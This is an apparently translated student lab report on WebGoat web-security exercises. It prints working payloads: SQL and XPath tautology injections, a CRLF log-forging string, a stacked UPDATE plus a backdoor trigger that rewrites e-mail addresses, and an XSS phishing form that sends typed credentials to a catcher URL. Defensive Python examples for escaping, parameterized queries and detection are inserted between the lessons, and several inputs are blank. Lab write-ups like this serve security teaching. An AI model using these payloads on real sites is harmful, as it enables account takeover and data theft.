EXP9 20155218 Web Security Fundamentals Practice

Source: Internet
Author: User
Tags xpath

EXP9 Web Security Basic Practice
1. Experimental environment configuration:
    • 1. On the command line ran java -jar webgoat-container-7.1-exec.jar to start WebGoat; the folder was clearly there, but it did not succeed;
    • 2. Deleted it and re-imported it once, and unexpectedly it succeeded; sometimes it is just that strange;
    • 3. Then open http://localhost:8080/WebGoat in the browser, enter the login screen, and start the experiment:
    • 4. Found that it can also be done on a Mac, so chose the Mac; the specific steps match those on Linux;

2. Experimental items:
(1) Injection Flaws
1), Command injection
    • 1. Use the browser's "Inspect" tool to find the appropriate form element and modify its code; any command that can be run on the command line can be entered here;

    • 2. Successful attack:

2), Numeric SQL injection
    • 1. Goal: Try to inject a SQL string that causes all weather data to be displayed.
    • 2. Workaround: Use WebScarab to intercept the submitted request and replace 101 with 101 or 1=1!

    • 3.:

3), Log Spoofing
    • 1. Target:
      The gray area below represents what will be logged in the Web server's log file.
      Your goal is to make it look as though the user "admin" logged in successfully.
      Elevate the attack by adding a script to the log file.
    • 2. Workaround: In the user name box, enter

      xzh%0d%0aLogin Succeeded for username: admin
    • 3. Experimental results:
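As an added example (not part of the original report and not WebGoat's own code), the following Python shows why the payload above works against a logger that writes the user name verbatim, and the two controls a defender would apply: escaping control characters before the line is written, and parsing the log one physical line per record so a forged record can be seen for what it is. The log line format, the sample user name and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the lesson's payload as the server sees it after URL decoding
SPOOFED_USERNAME = unquote("xzh%0d%0aLogin Succeeded for username: admin")


def log_line_naive(username, succeeded):
    # Writes the user-supplied name verbatim: a CR/LF inside it starts a fake second record
    status = "Succeeded" if succeeded else "Failed"
    return f"Login {status} for username: {username}"


def sanitize_for_log(value):
    # Replace every control character (CR, LF, NUL, ESC, ...) with a visible escape so the
    # entry stays on one physical line and terminal escape tricks are neutralized as well
    return re.sub(r"[\x00-\x1f\x7f]", lambda m: "\\x%02x" % ord(m.group()), value)


def log_line_safe(username, succeeded):
    status = "Succeeded" if succeeded else "Failed"
    return f"Login {status} for username: {sanitize_for_log(username)}"


# One physical line is one record; the user name is everything after the fixed prefix
RECORD = re.compile(r"^Login (?P<status>Succeeded|Failed) for username: (?P<user>.*)$")


def parse_log(text):
    """Return (status, user) for every well-formed physical line, as a log analyst's script would."""
    return [(m.group("status"), m.group("user"))
            for m in map(RECORD.match, text.splitlines()) if m]


def admin_successes(text):
    """Defender check: which records claim a successful login by 'admin'?"""
    return [user for status, user in parse_log(text)
            if status == "Succeeded" and user == "admin"]


if __name__ == "__main__":
    naive = log_line_naive(SPOOFED_USERNAME, succeeded=False)
    safe = log_line_safe(SPOOFED_USERNAME, succeeded=False)
    print(repr(naive))   # two records: a failed 'xzh' and a forged successful 'admin'
    print(repr(safe))    # one record whose user name visibly contains \x0d\x0a
    print(admin_successes(naive), admin_successes(safe))
```

Escaping the control bytes keeps the forged text inside the single "Failed" record, where it is visibly odd instead of reading as a separate successful login. The second half of the lesson (a script in the log file) is the same problem for HTML log viewers; applying html.escape() to the same field before display covers it.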

4), XPATH injection
    • 1. Objective: The following table allows employees to see all of their personal data, including their wages. Your account is mike/test123. Your goal is to try to view other employee data.
    • 2. Method: Look at how the XPath query is constructed:

      String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
      File d = new File(dir);
      XPathFactory factory = XPathFactory.newInstance();
      XPath xPath = factory.newXPath();
      InputSource inputSource = new InputSource(new FileInputStream(d));
      // the user name and password are concatenated straight into the expression
      String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
      nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);
    • 3. XPath injection attacks are similar in nature to SQL injection attacks: the attacker enters strings that the site interprets as query code. They take advantage of the loose input handling and fault tolerance of the XPath parser to attach malicious XPath query code to a URL, form field, or other input, gaining access to privileged information and changing it. XPath injection is a newer attack method applied to Web services; it allows an attacker to obtain the full content of an XML document through XPath queries without knowing the application's XPath query in advance.
    • 4. Input: This is similar to SQL injection;
      enter the following as both the user name and the password:

      xzh' or 1=1 or ''='
    • 5. The expression as the computer interprets it:

      expression = "/employees/employee[ ( loginID/text()='xzh' or ''='') and (  passwd/text()='xzh' or ''='' ) ]"
    • 6. Result:

5), String SQL injection
    • 1. Direct input:

      ' or 1=1 --
    • 2. Result:

    • 3. This is very simple; without referring to anything, it succeeded on the first try;

6), Lab: SQL Injection, Stage 1: String SQL Injection
    • 1. Target: Use string SQL injection to bypass authentication. Use SQL injection to log in as the boss ('Neville') without using the correct password. Verify that Neville's profile can be viewed and that all functions are available (including search, create, and delete).
    • 2. Attempt: Wanted to modify the user name, but it did not succeed; looked at the back-end code and tidied up my thinking a bit. ++ Discovery: the login itself should be able to succeed, but the jump to the next page is based on the userID, and my userid had been changed by me to userid--, which is naturally wrong ++

    • 3. So the only option is to modify the maximum input length of the input box and enter in the Password box: ' or 1 = 1--
    • 4. Successful login:

Second, Stage 3: Execute SQL injection to bypass authorization.
    • 1. Goal: As a general employee ('Larry'), use SQL injection in the parameters of the View function (from the List Staff page) to view the boss's profile ('Neville').
    • 2. Log in using the same method as in the previous step, then modify the value of the employee ID from the original 101 to

      Because the boss has the highest salary, the boss is the last one in the sorted result.

    • 3. Result:
    • 4. If we log in with another employee ID (Curly) and just change the value to

      it naturally shows the information of the first employee (Larry);

7), Database backdoors
    • 1. Target: Use string SQL injection to execute multiple SQL statements. The first phase uses a vulnerable field to create two SQL statements: the first one is the system's, the second one is entirely yours. Your account ID is 101. This page allows you to view passwords, SSN, and salary. Try to inject another update to change your salary.
    • 2. Input 101; update employee set salary=5218 to modify the salary;
    • 3. In the same way, insert a database backdoor:

      101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid
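One added example (Python with the standard sqlite3 module; not the lesson's Java/HSQLDB code) that covers the three SQL injection lessons above, 2) numeric, 5) and 6) string, and 7) stacked statements with a backdoor trigger. Each vulnerable query is shown beside its parameterized form, run against in-memory tables constructed for the example, together with a query over sqlite_master that a defender can use to spot a trigger that should not exist. The table layout, ids, names, salaries, passwords and e-mail addresses are all made up, and executescript() stands in for a backend that runs every statement it is handed.

```python
import sqlite3

# Constructed stand-in for the lesson's tables; every value here is made up
EMPLOYEES = [
    (101, "Larry", "larry-pw", 55000, "larry@example.invalid"),
    (102, "Moe", "moe-pw", 62000, "moe@example.invalid"),
    (112, "Neville", "neville-pw", 450000, "neville@example.invalid"),
]
WEATHER = [(101, "Columbia", 65), (102, "Seattle", 58), (103, "New York", 72)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employee (userid INTEGER PRIMARY KEY, first_name TEXT, "
                 "password TEXT, salary INTEGER, email TEXT)")
    conn.executemany("INSERT INTO employee VALUES (?, ?, ?, ?, ?)", EMPLOYEES)
    conn.execute("CREATE TABLE weather_data (station INTEGER, name TEXT, temp INTEGER)")
    conn.executemany("INSERT INTO weather_data VALUES (?, ?, ?)", WEATHER)
    return conn


# Lesson 2, numeric injection: the vulnerable form pastes the station id into the statement,
# so "101 or 1=1" turns the WHERE clause into a tautology and every station is returned.
def weather_vulnerable(conn, station):
    return conn.execute(f"SELECT * FROM weather_data WHERE station = {station}").fetchall()


def weather_safe(conn, station):
    station_id = int(station)   # anything that is not an integer is rejected with ValueError
    return conn.execute("SELECT * FROM weather_data WHERE station = ?", (station_id,)).fetchall()


# Lessons 5 and 6 (Stage 1), string injection in the login query.
def login_vulnerable(conn, name, password):
    sql = (f"SELECT userid FROM employee WHERE first_name = '{name}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    sql = "SELECT userid FROM employee WHERE first_name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


# Lesson 7, stacked statements: executescript() runs every ';'-separated statement it is given,
# which is the behaviour the lesson's backend shows; execute() with a bound parameter cannot.
def salary_vulnerable(conn, userid_text):
    conn.executescript(f"SELECT salary FROM employee WHERE userid = {userid_text}")


def salary_safe(conn, userid_text):
    row = conn.execute("SELECT salary FROM employee WHERE userid = ?",
                       (int(userid_text),)).fetchone()
    return row[0] if row else None


def list_triggers(conn):
    # Defender check: an application that defines no triggers should get an empty list here
    return [row[0] for row in
            conn.execute("SELECT name FROM sqlite_master WHERE type = 'trigger'")]


if __name__ == "__main__":
    conn = make_db()
    print(len(weather_vulnerable(conn, "101 or 1=1")), "stations returned via injection")
    print(login_vulnerable(conn, "Neville", "' or 1=1 --"), "userids returned via injection")
    salary_vulnerable(conn, "101; UPDATE employee SET salary = 5218 WHERE userid = 101")
    print(salary_safe(conn, "101"), "salary after the stacked UPDATE")
    print(list_triggers(conn), "triggers present")
```

The parameterized versions never see the input as SQL text, so the same strings either fail int() or simply match no row; the sqlite_master query is the kind of periodic check that catches a backdoor trigger after the fact.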

8) Phishing with XSS
  • 1. Target: Phishing attack:
  • 2. Method: Insert the XSS attack code into the search field:

    </form>
    <script>
    function hack(){
      XSSImage=new Image;
      XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
      alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
    </script>
    <form name="phish">
    <br><br><HR><H3>This feature requires account login:</H3><br><br>
    Enter Username:<br><input type="text" name="user"><br>
    Enter Password:<br><input type="password" name="pass"><br>
    <input type="submit" name="login" value="login" onclick="hack()">
    </form><br><br><HR>
  • 3. Enter the information and click Search; the attack succeeds

9), Stored XSS Attacks
  • 1. Goal: Place an HTML tag in the form input field.
  • 2. Enter in the message board:
  • 3. Open it and a dialog box pops up; but XSS is not just a pop-up box;
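Added example (Python; not WebGoat's code) for the two XSS lessons, 8) and 9): the same message-board post rendered without and with HTML escaping, plus a detection pass over stored posts that flags the markup the phishing payload above relies on (script and form tags, inline event handlers). The posts, the page template and the list of flagged elements are constructed for this example.

```python
import html
import re

# Constructed message-board posts; the second one is the essence of the lesson 8 phishing form
POSTS = [
    ("alice", "Meeting moved to 3pm"),
    ("mallory", '</form><script>function hack(){}</script>'
                '<form name="phish"><input type="submit" onclick="hack()"></form>'),
]


def render_post_vulnerable(author, body):
    # Stored text goes into the page unchanged, so markup inside it becomes live markup
    return f'<div class="post"><b>{author}</b>: {body}</div>'


def render_post_safe(author, body):
    # html.escape turns <, >, &, " and ' into entities, so the same text renders as text
    return f'<div class="post"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


# Markup that should never appear in a plain-text message: openers for elements that execute,
# embed or submit, inline event handlers inside a tag, and javascript: URLs
ACTIVE_MARKUP = re.compile(
    r"<\s*/?\s*(script|iframe|form|img|svg|object|embed)\b"
    r"|<[^>]*\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.I,
)


def flag_suspicious_posts(posts):
    # Detection pass over stored messages, e.g. feeding a review queue or an alert
    return [author for author, body in posts if ACTIVE_MARKUP.search(body)]


def page_is_inert(rendered):
    # Template test: nothing from user content survived as a tag, handler or script URL
    return ACTIVE_MARKUP.search(rendered) is None


if __name__ == "__main__":
    for author, body in POSTS:
        print(render_post_vulnerable(author, body))
        print(render_post_safe(author, body))
    print("flagged:", flag_suspicious_posts(POSTS))
```

Escaping on output is the control that makes the stored payload harmless; the regex pass is only a secondary signal for spotting attempts, since an attacker can vary the markup in ways a pattern list does not anticipate.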

10), Cross Site Request Forgery (CSRF)
  • Target: Put the URL into the message box in the form of an image; the URL is not visible to other users, and once a user clicks on the image, a CSRF event is triggered.
  • Input:
  • Success:

3. Experimental experience:
